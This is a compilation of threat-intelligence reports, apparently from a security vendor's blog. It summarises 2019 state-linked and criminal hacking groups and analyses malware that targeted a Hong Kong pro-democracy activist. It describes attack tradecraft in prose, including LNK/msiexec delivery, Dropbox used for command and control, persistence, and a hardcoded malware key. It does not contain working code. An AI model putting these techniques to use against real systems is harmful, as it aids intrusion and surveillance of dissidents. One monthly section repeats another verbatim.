Hacking Activity of SectorD Group in 2019

SectorD Group Overview

A total of 15 subgroups of SectorD have been found to date. They perform hacking activities for the purpose of gathering high-quality information such as politics and diplomacy about individuals or countries that oppose the SectorD government. This article presents a summary of monthly activities of the SectorD Group which were discovered in 2019.

Figure 1 SectorD subgroup activity in 2019

SectorD groups tend to attack geographically close countries and mainly targets enterprises, universities, IT companies, research institutes, energy industries. They attach malicious documents to spear phishing emails and use known vulnerabilities to attack. Of the 15 groups, the activities of the SectorD02 group were most prominent this year, followed by the SectorD01 and SectorD12 groups.

Below is a map of the countries that were targeted by the SectorD Group in 2019. The darker the red, the more frequent the attack. This shows that the SectorD Group has conducted frequent hacking activities against their neighboring countries in the Middle East and the United States.

Figure 2 The main target countries for the SectorD Group in 2019

Hacking Activity of SectorD Groups in 2019

The following is a timeline and detailed monthly activity of the SectorD groups hacking activity found in 2019.

timeline_blog
Figure 3 Timeline of main activities for the SectorD Group in 2019

January

SectorD targets were Europe including Belarus, Ukraine, and Sweden, East Asia including South Korea, and the Middle East centering on Saudi Arabia, Turkey, and Oman. Two hacking groups were found to be active.

Outside of the Middle East, their purpose seem to be to steal diplomatic related information from countries which have political and economic cooperation with other countries in the Middle East, such as Europe and East Asia. In particular, South Korea recently had diplomatic progress in which it agreed to cooperate in seven areas through summit talks with Qatar.

Hacking techniques used by SectorD continue to include spear phishing with Microsoft Word files which contained malicious macros.

Based on their hacking activities so far, it appears that SectorD is starting to expand its scope to include hacking countries with political and economic cooperation with Middle Eastern countries, rather than solely targeting countries in the Middle East.

April

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12 were found among SectorD hacking groups this April, with hacking activity targeted at countries in the Middle East, including the Sector’s political competitor Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey, and Ukraine, Estonia, Germany, and the United States, as well as South and East Asia.

SectorD hacking groups basically used Spear Phishing techniques with malware and example phishing documents were word files using confidential U.S. State Department forms. At the same time, malware in the form of compressed files that abused the recently discovered WinRAR’s vulnerability were also found. SectorD hacking groups mainly collected political, military and diplomatic information from countries in the Middle East that are its political competitors.

However, with the recent declaration of noncompliance with some treaties of a Nuclear Agreement it is part of, hacking aimed at collecting information on government activities are expected to intensify as conflicts are expected with other countries in many areas, including politics and diplomacy.

May

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

June

In June, a total of two hacking groups were found among SectorD groups. They targeted countries in the Middle East which they have a politically competitive relation with. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively in Middle Asia to Middle East, mainly in Hong Kong, Sweden, Tajikistan, United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, United States and Mexico. SectorD11 group activity was discovered in Middle Asia to Middle East.

They are constantly using spear phishing emails attached to Microsoft Office document files. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who are against SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

August

Among the SectorD groups, the activities of two hacking groups, SectorD02 and SectorD14 were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

September

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to the previous cases – sending a Microsoft Word file with a malicious macro to the hacking target using an attachment in a spear phishing email. In addition to these hacking techniques, the SectorD05 group has launched attacks against researchers from the United States, Middle East, and France, focusing on academic research on SectorD, or performing phishing attacks against people targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofing sites that are disguised as user login pages, and perform hacking activities to steal user credentials entered by targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

October

A total of six hacking groups SectorD01, SectorD02, SectorD05, SectorD10, SectorD11 and SectorD15 were discovered among SectorD groups this October. Hacking activity of the SectorD01 group was found in the United States and Ireland. Hacking activity of the SectorD02 group was found in Lebanon, Ireland, Iraq, South Korea and Canada. Hacking activity of the SectorD05 group was found in the United States and Israel. Hacking activity of the SectorD10 group was found in the United States. Hacking activity of the SectorD11 group was found in France, Saudi Arabia, the United States, Netherlands, Brazil and Russia. Hacking activity of the SectorD15 group was found in Algeria, the United Kingdom, the United Arab Emirates, Saudi Arabia and the United States.

The SectorD01 group modified malware that had DNS tunneling functions first discovered in November 2018 and reused it in this hacking activity.

The SectorD02 group attached a Microsoft Excel file containing a malicious macro to a spear phishing email. After that, the encoded VBS script would be decoded and executed using the the legitimate wscript.exe.

The SectorD05 group used social media to post malicious links that redirect to specific websites, or send SMS messages containing malicious links to individuals of opposition about government agencies. Sometime they used spear phishing emails that included malicious links.

The SectorD10 group was primarily hacking into universities in the United States and used emails containing malicious links redirect to phishing sites.

The SectorD11 group produced malicious APK files written in Persian and wanted to collect information from hacked Android-based smartphones.

The SectorD15 group created malicious websites using an American Gulf War veterans theme. The website, which says it will hire veterans, sends the input information to the attacker’s server.

SectorD groups conducted hacking activities targeting countries that are related to political rivalries to a certain country. The purpose of the recent hacking activities of the SectorD groups is to collect high-level information such as political and diplomatic activities of people or nations opposed to a specific government.

November

The SectorD15 group created malicious websites using an American Gulf War veterans theme. The website, which says it will hire veterans, sends the input information to the attacker’s server.

SectorD groups conducted hacking activities targeting countries that are related to political rivalries to a certain country. The purpose of the recent hacking activities of the SectorD groups is to collect high-level information such as political and diplomatic activities of people or nations opposed to a specific government.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, October 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from September 21 to October 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA04, SectorA05 and Sector07 groups were discovered among SectorA groups this October. SectorA01 group’s hacking activity was found in areas including the United States, Philippines, the United Kingdom, Germany, Nigeria, South Korea and India. SectorA04 group were found in areas including South Korea, United States, Japan and India. Hacking activity of the SectorA05 group was found in South Korea and Ukraine. Hacking activity of the SectorA07 group was found in South Korea.

The SectorA01 group has hacked into cryptocurrency traders by distributing fake cryptocurrency trading programs to both macOS and Windows operating systems.

The SectorA04 group hacked into an ATM Machine operated by an Indian financial firm. The attack is similar to an incident in South Korea in the past, and is a hacking activity aimed at stealing card information input through the hacked ATM device and stealing real money.

The SectorA05 group used a Hangul file (HWP) that disguised it as an expert advisory request document containing the vulnerability. This activity was conducted to collect information related to the SectorA government from academia, universities, and research institutes.

Similar to SectorA05 group, SectorA07 group used malware in the form of a Hangul file. The Hangul file used cryptocurrency mining as a theme. It seems that the hacking activity was performed targeting individuals and organizations related to cryptocurrency trading and mining.

The purpose of the hacking activities of the SectorA hacking groups to date is to collect high-quality information about political and diplomatic activities of South Korea and to steal money from financial organization all around the world. This purpose has remained the same for a long time, and is expected to continue without change for the time being.

2. SectorB Activity Features

A total of seven hacking groups SectorB01, SectorB05, SectorB06, SectorB10, SectorB11, SectorB21 and SectorB22 were discovered among SectorB groups this October. The hacking activity of the SectorB01 group discovered to date include North and South America (including the United States and Brazil), the Middle East (including Turkey, Ukraine and Russian Federation). It was also found in Europe and in Asia (including Thailand, Singapore, Indonesia and South Korea). The SectorB05 group’s hacking activity was found in Vietnam. The SectorB06 group’s hacking activity was found targeting Russian Federation and South Korea. The SectorB11 group’s hacking activity was found in the United States, Poland and Vietnam. The SectorB21 group’s hacking activity was found in Tibet. The SectorB22 group’s hacking activity was found in Asia (including Cambodia, Philippines, Japan, Malaysia and Vietnam), in Europe (including United Kingdom, Ukraine and Russian Federation) and in Central Asia (including Turkmenistan).

The SectorB01 group is focused on using malware related to cryptocurrency, unlike past hacking purposes and activities. Until now, it is not clear why SectorB01 group was using this kind of malware, so it is worth paying attention to their hacking activities in the future.

The SectorB05 group used the name of a Russian security company in its electronic signature in its hacking activity targeting Vietnam.

The SectorB06 group has been spreading malware through fake Russian government websites. They targeted officials of Russian government agencies and intended to collect high-level information related to the activities of Russian government agencies.

The SectorB10 group has been targeting South Korean government agencies since 2016 up till now.

The SectorB11 group used spear phishing to target individuals related to the Vietnamese government. They attach malicious document files to their email, and used legitimate government documents such as official guidelines, official documents, press releases, and surveys as decoy files.

The SectorB21 group conducted a hacking campaign against the Tibetan government. They used various vulnerabilities against Windows, Mac and Android operating systems.

The SectorB22 group attached archive files that contained shortcut files to spear phishing emails and targeted to government agencies.

The purpose of the hacking activities of SectorB groups to date is to collect high-level information such as political and diplomatic activities of government agencies around the world.

3. SectorC Activity Features

A total of three hacking groups SectorC01, SecotorC02 and SectorC04 were discovered among SectorC groups this October. Hacking activity of the SectorC01 group was found in the United States, Belarus, United Kingdom, Belgium, Ukraine and Canada. Hacking activity of the SectorC02 group was found in Belarus, Russian Federation, United Kingdom, Sweden, Georgia, Bulgaria, Brazil and Italy. Hacking activity of the SectorC04 group was found in Israel, Romania and Moldova.

The SectorC01 group used a spear phishing email which had an MS Word file attached. When executing the document file, it download a remote template hosted on Dropbox to downloaded execute a document which included a malicious macro script.

The SectorC02 group lured victims with malware disguised as legitimate software from illegal software download sites (warez) and monitors victim’s networks activity.

The SectorC04 group’s hacking campaign target government agencies performing diplomatic affairs. They used a spear phishing email that contained a link, and when the link was clicked, an image containing malware which was created with stenography was downloaded.

The purpose of the hacking activities of the SectorC groups to date is to collect high-level information such as political and diplomatic activities in countries that are located near to the government agencies supporting SectorC.

4. SectorD Activity Features

A total of six hacking groups SectorD01, SectorD02, SectorD05, SectorD10, SectorD11 and SectorD15 were discovered among SectorD groups this October. Hacking activity of the SectorD01 group was found in the United States and Ireland. Hacking activity of the SectorD02 group was found in Lebanon, Ireland, Iraq, South Korea and Canada. Hacking activity of the SectorD05 group was found in the United States and Israel. Hacking activity of the SectorD10 group was found in the United States. Hacking activity of the SectorD11 group was found in France, Saudi Arabia, the United States, Netherlands, Brazil and Russia. Hacking activity of the SectorD15 group was found in Algeria, the United Kingdom, the United Arab Emirates, Saudi Arabia and the United States.

The SectorD01 group modified malware that had DNS tunneling functions first discovered in November 2018 and reused it in this hacking activity.

The SectorD02 group attached a Microsoft Excel file containing a malicious macro to a spear phishing email. After that, the encoded VBS script would be decoded and executed using the the legitimate wscript.exe.

The SectorD05 group used social media to post malicious links that redirect to specific websites, or send SMS messages containing malicious links to individuals of opposition about government agencies. Sometime they used spear phishing emails that included malicious links.

The SectorD10 group was primarily hacking into universities in the United States and used emails containing malicious links redirect to phishing sites.

The SectorD11 group produced malicious APK files written in Persian and wanted to collect information from hacked Android-based smartphones.

The SectorD15 group created malicious websites using an American Gulf War veterans theme. The website, which says it will hire veterans, sends the input information to the attacker’s server.

SectorD groups conducted hacking activities targeting countries that are related to political rivalries to a certain country. The purpose of the recent hacking activities of the SectorD groups is to collect high-level information such as political and diplomatic activities of people or nations opposed to a specific government.

5. SectorE Activity Features

A total of three hacking groups SectorE02, SectorE04 and SectorE05 were discovered among SectorE groups this October. Hacking activity of the SectorE02 group was found in Pakistan and the United Kingdom. Hacking activity of the SectorE04 group was found in Taiwan, France, Russia, Germany, United States, Malaysia and China. Hacking activity of the SectorE05 group was found in China, Japan, Ukraine, Pakistan, the United States, Philippines and United Kingdom.

The SectorE02 group used malware with PDF file icons and the RLO (Right to Left Override) naming technique. A specific URL is accessed by the malicious code which downloads and executes additional malware.

The SectorE04 group used a malicious document file containing the CVE-2017-11882 vulnerability as an attachment to a spear phishing email. Via the vulnerability, it also downloads and runs HTA scripts.

The SectorE05 group used the SFX executable archive file as an attachment to the spear phishing email. Inside the compressed file, malware was embedded along with image files of auto parts produced by a specific Thai company.

Until now, the hacking activities of the SectorE groups are intended to gather high-level information including political, diplomatic and military activities involving the Pakistani government. However, recently they expanded activity to East Asia and other regions, including China, where the share of activities to obtain high-level information on politics, diplomacy and technology of other countries is also increasing.

6. SectorF Activity Features

The SectorF01 group was discovered among SectorF groups this October. Hacking activity of the SectorF01 group was found in Cambodia.

The SectorF01 group used the SFX executable compressed file disguised with a MS Word document icon for hacking. The SFX file archive contained files with pkg and bin extensions.

The SectorF01 group aims to gather high-level information including political, diplomatic and military activities in countries nearby. They also aim to steal advanced technical information to advance their economic development.

6. SectorH Activity Features

The SectorH01 group was discovered among SectorH groups this October. SectorH01 group’s activity was found in China, Germany, Italy, Japan, Belgium, France, the Czech Republic and the United States.

The SectorH01 group attached malicious MS Excel files to spear phishing emails. The macro script embedded in the document file is configured to run HTA scripts hidden on the attacker’s Blogspot website.

The hacking activities of the SectorH group include hacking activity for both cyber crimes and government support purposes. In particular, as diplomatic friction with neighboring continues, activities to gather high-level military and political information from them will also continue.

7. SectorP Activity Features

A total of two hacking groups, SectorP01 and SectorP02 were discovered among the SectorP groups this October. Hacking activity of the SectorP01 group was found in Turkey, United States, Algeria, Kuwait, Syria, India, China and Germany. Hacking activity of the SectorP02 group was found in Canada, Syria, Austria, the United States and Turkey. SectorP group usually directly hacks websites, news media, and Twitter accounts to post images that relate to their political ideology or post criticisms of opposing forces.

The SectorP01 group is conducting hacking against dissidents who oppose political activity of certain governments, usually targeting Windows and Android systems.

The SectorP02 group used social engineering and watering hole techniques lead their targets to websites which distribute malware. The disseminated Android malware were mainly disguised as an installation program of normal software.

The hacking activity of the SectorP group were directed against dissidents who oppose political activity by certain governments. In particular, the proportion of malware that runs on Android smartphones is higher than that of Windows-based malware. This is due to the fact that internet usage in the country is higher in smartphones than in PCs, and the phone contains more information related to dissidents. These hacking activities are expected to continue in the future.

8. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ03, SectorJ04, SectorJ07 and SectorJ09 groups were discovered this October. Hacking activity of the SectorJ01 group was discovered in the United Kingdom, Russia, United States, United Arab Emirates, China, Romania and Bulgaria. Hacking activity of the SectorJ02 group was found in the Philippines. Hacking activity of the SectorJ03 group was discovered in India, United Arab Emirates and Jordan. Hacking activity of the SectorJ04 group was discovered in Bosnia, the United Kingdom, Slovenia, Canada, Germany, Switzerland, France, Poland, South Korea, Japan, the United States, United Arab Emirates and Spain. Hacking activity of the SectorJ07 group was found in Hong Kong, China, Hungary and Spain. Hacking activity of the SectorJ09 group was found in the Czech Republic and Ukraine.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

The SectorJ01 group includes malicious URLs in the body of spear phishing emails that download MS Word files which are disguised as visa-related documents.

The SectorJ02 group inserted skimmer code to a JavaScript library provided by an e-commerce service provider to many online stores. When customers payments were made using credit cards, the skimmer code secretly collected the credit card payment information.

The SectorJ03 group attached MS Word documents containing malicious macro scripts to spear phishing emails. The macro script downloads and executes a Visual Basic script from a specific URL, which then downloads and executes an MSI file from a specific server.

The SectorJ04 group continued using large-scale spam emails, and kept their existing characteristics such as using malicious documents with an Office theme. However, they have also started using a new malware written in C++ which other researchers have called SDBBot. It has the characteristic of using the SDB (Shim Database) file to maintain the persistence in the infected system.

The SectorJ07 group attacked Linux-based systems using ELF malware in the same manner as their past activities, continuously carrying out cryptomining activities.

Similar to the SectorJ02 group, the SectorJ09 group inserted a skimming script into web pages of several online stores to collect payment and personally identifiable information (PII) each time a credit card payment occurs.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Threat Actor Targeting Hong Kong Pro-Democracy Figures

Introduction

At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting for feedback on his supposed thesis which includes recommendations on how to end the Hong Kong unrest. The email contained a link to a Google drive ZIP file.

The contents of FYI.zip downloaded from the Google Drive link

The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.

The third file masquerading as a Nikkei Asian Review document is actually a LNK shortcut file which had a double extension. When LNK files are viewed through archiving software, the double extension “.rtf.lnk” will be shown correctly. If the file was extracted and viewed through the Windows Explorer, however, the operating system always hides the LNK extension by default.

Analysis of the LNK file shows running it will execute msiexec.exe to download and run a remote MSI file

The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin to remotely download and run MSI files which have the PNG extension. In this case, the MSI file is remotely downloaded from a GitHub repository and account which was created on October 10.

A snapshot of the GitHub repository on October 29

siHost64

The MSI file, “siHost64.png”, was created using a registered or cracked EXEMSI program. Running it will drop and run “siHost64.exe” in the %APPDATA% folder. This executable is a PyInstaller executable which has over a thousand files inside it, but the main important file is the compiled python script “siHost64”.

Unpacking the PyInstaller executable shows the real files, some of which cannot be seen when performing dynamic analysis

By restoring the first eight missing bytes of “siHost64” which is typically required for such PyInstaller files, we are then able to decompile the compiled python script and analyze the functionality of this malware:

  • Use the Python requests library to call the DropBox API which connects to DropBox and uses it as a HTTPS C2 server
  • Use the system proxy for communications if any
  • Add itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the registry name “siHost64”. On October 31, the new version of the malware changed the registry name used to “Dropbox Update Setup”.
  • Perform AES encryption with CBC mode on uploaded files with the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
  • Check in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged in user
  • Check for files from the C2 server which contain encrypted arbitrary commands to be run, execute that command, and create a new encrypted file containing the results of the executed command.
Example of the malware using the Dropbox API to check in

Based on the check in information from infected machines, it appears that there is a single infected Hong Kong victim of interest to this threat actor connecting to the Dropbox app besides the target we described at the start. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.

Besides those exfiltrated documents, the C2 server also appeared to host their next stage malware such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable which seems to be for upgrading the previous Windows operating system version to Windows 10, and “GetCurrentDeploy.dll” likely being the name of the DLL which is side loaded. The first version of “GetCurrentRollback.exe” we could find was since 2016 and the latest in 2019 November, which means all version might be exploitable by DLL Sideloading at first glance.

A version of GetCurrentRollback.exe signed on November 13, 2019 is still vulnerable to DLL Sideloading

Conclusion

Based on the victim profile and the exfiltrated files, it appears one of the intelligence requirements of the threat actor is to monitor people with relations to the Hong Kong protests, targeting either them or the people around them. There are multiple possibilities for this requirements, with the most likely being to understand the inner thoughts of pro-democracy movement, or to support or undermine the movement behind the scenes.

Using Dropbox and other legitimate services such as Google Drive and GitHub
throughout the attack life cycle is not a new concept for threat actors, allowing them to easily bypass network detection. To counter this threat, enterprises or teams within enterprises nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users which may be targeted by state sponsored threat actors rarely have this luxury.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1192 Spearphishing Link

Execution

T1204 User Execution
T1218 Signed Binary Proxy Execution
T1064 Scripting

Persistence

T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1218 Signed Binary Proxy Execution
T1102 Web Service

Discovery

T1083 File and Directory Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery

Collection

T1005 Data from Local System

Command and Control

T1043 Commonly Used Port
T1132 Data Encoding
T1071 Standard Application Layer Protocol
T1032 Standard Cryptographic Protocol
T1102 Web Service

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, and SectorA07, were found among SectorA hacking groups this September.

The parallel requirements of the hacking activities of SectorA hacking groups, which continues to date, is to both collect high-quality information related to government activities such as political and diplomatic activities related to South Korea or related to SectorA relief organizations, and to illegally profit from crimes around the world. The purpose of this hacking has been continued for a long time, and for this strategic hacking purpose, it is expected to continue without change for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were related to collecting high-level information such as political and diplomatic activities related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria, and used malware in the form of files of Hangul software files, which is widely used by South Korean government agencies.

SectorA05 group activity was found in United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The hacking technique used by the group was spear phishing emails to deliver malware in the form of Microsoft Word files to the target of attack. The lure document had a topic related to SectorA’s economic sanctions, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. During that time, the attacker used a Windows executable file with a file name associated with a MOU contract with the Department of Defense. The file was disguised using the icon of Microsoft Word.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing, which uses document files that exploit N-day vulnerabilities in Microsoft Office as attachments. This method of intrusion is common for them when targeting developing countries such as Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

Since the hacking activities of the SectorB group discovered in September are mostly concentrated in Southeast Asia, it appears to be closely related to the political and diplomatic activities of the SectorB government. Thus, the hacking activity of SectorB group is expected to continue especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. The SectorC08 group used to hack only in Europe in the past, but this is the first time that hacking activity has been found in East Asia (including China and South Korea), and additional analysis of their purpose is required. Although the SectorC groups, where hacking activity was found, use different hacking techniques, their spear phishing emails display common characteristics.

The SectorC01 group attaches Microsoft Word document malware to spear phishing emails and uses remote template injection techniques to deliver malware in Microsoft Word files containing macro scripts to their targets.

Similar to past hacking cases, the SectorC08 group maintains their traditional hacking approach using spear phishing emails with 7ZipSPX compressed files attached. However, we also confirmed that their hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have many varied attack techniques because of their long history, and they are likely to continue a similar form of hacking in the future, as they continue to do so in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to the previous cases – sending a Microsoft Word file with a malicious macro to the hacking target using an attachment in a spear phishing email. In addition to these hacking techniques, the SectorD05 group has launched attacks against researchers from the United States, Middle East, and France, focusing on academic research on SectorD, or performing phishing attacks against people targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofing sites that are disguised as user login pages, and perform hacking activities to steal user credentials entered by targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05 were found among SectorE hacking groups this September. The activities of the SectorE hacking groups were discovered in September in Europe (including Belgium, Portugal, United Kingdom, France and the Russia), Southeast Asia (including Singapore, Sri Lanka, Philippines, Thailand), East Asia (including Taiwan and China), North America (including United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but recently the range of geographical hacking activities of these groups is gradually widening.

The basic hacking techniques of the SectorE groups use attached documents in spear phishing emails, which could be a Microsoft Office document with a malicious macro functionality or previously known code execution vulnerabilities, or files from InPage software that are only frequently used in certain regions. They hosted malware in the form of Microsoft Word document that contain macro scripts on a specific domain. The document performs a remote template injection which would query the server to download the additional macro template from the attacker’s domain.

As the SectorE Group geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques. In past cases, whenever the geographic radius of hacking groups’ targets expanded, so did their hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The hacking activity found in September included a malware that has a similarity to a previously found malware, and is a RAR compressed file consisting of an executable file disguised as an Microsoft Word icon and a malicious DLL file, similar to the existing hacking technique. The SectorF01 group uses the DLL side loading technique to carry out the attack. When the executable file disguised as Microsoft Word program is executed, the DLL in the folder is loaded and executed.

As there have been many cases where their hacking activity has been discovered in regions including SectorF in the past, it is possible to consider hacking activities aimed at people who are opposed to political activities of the SectorF government. However, as hacking activities are also being conducted for the purpose of economic development in SectorF, additional analysis needs to be done while tracking their hacking activity areas and hacking targets.

6. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September, but this is relatively infrequent unlike other government supported hacking groups.

SectorH01’s hacking activity was discovered in September, and their hacking activity was found in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware in Microsoft Excel file formats containing macro scripts through spear phishing emails. The macro script executes JavaScript code hosted in Pastebin, which uses PowerShell to transfer the injector and DLL-type files to be injected into the infected system and then executes autorun registration for persistence.

The SecotorH01 group’s increased and broadening hacking activity highlight the dynamics of competition between SectorE and SectorH. It is important to pay close attention to the future competition between the two countries as to whether this increased hacking activity will affect the international situation in the future.

7. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 group was discovered this September.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and United States. They sent a spear phishing email to the target containing a link to download a JavaScript backdoor. When the malware is installed, it resides in memory and when the victim accesses an online payment page, skimming code would be injected into the HTML Document Object Model and collects payment information that the user types in.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

The group has been using spam emails with Office-themed Microsoft Excel or Word documents attached in the past for a while, installing malware on the infected system which transmits the information collected from the infected system to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachment in the form of LNK shortcut files.

SectorJ09 group activitywas found in Italy. They launched an attack on e-commerce service providers, injecting JavaScript into the payment page of the hotel’s website using a particular e-commerce service to load the remote script. Only when accessing the page from a mobile device, a skimmer script is loaded to steal credit card information.


